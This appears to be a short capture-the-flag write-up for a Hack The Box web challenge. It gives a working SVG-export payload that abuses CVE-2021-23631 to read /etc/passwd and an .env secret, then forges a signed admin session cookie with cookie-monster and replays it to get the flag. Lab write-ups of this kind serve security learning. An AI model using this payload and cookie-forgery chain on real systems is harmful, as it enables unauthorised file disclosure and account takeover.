Got a way to display file via svg to png LFI CVE-2021-23631:

POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://138.68.175.87:30484/dashboard>
Content-Type: application/json
Origin: <http://138.68.175.87:30484>
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=
{"svg":"`<svg-dummy></svg-dummy><iframe src=\\"file:///etc/passwd\\" width=\\"100%\\" height=\\"1000px\\"></iframe><svg viewBox=\\"0 0 240 80\\" height=\\"1000\\" width=\\"1000\\" xmlns=\\"<http://www.w3.org/2000/svg\\>"><text x=\\"0\\" y=\\"0\\" class=\\"Rrrrr\\" id=\\"demo\\">data</text></svg>`"}

Got the secret to sign/verify cookie in /app/.env

SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db

Used cookie-monster to generate the cookie:

root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
               _  _
             _/0\\/ \\_
    .-.   .-` \\_/\\0/ '-.
   /:::\\ / ,_________,  \\
  /\\:::/ \\  '. (:::/  `'-;
  \\ `-'`\\ '._ `"'"'\\__    \\
   `'-.  \\   `)-=-=(  `,   |
       \\  `-"`      `"-`   /

[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o

Burp repaeter:

GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://138.68.150.120:31876/>
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1

The flag is in the source code response:

var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'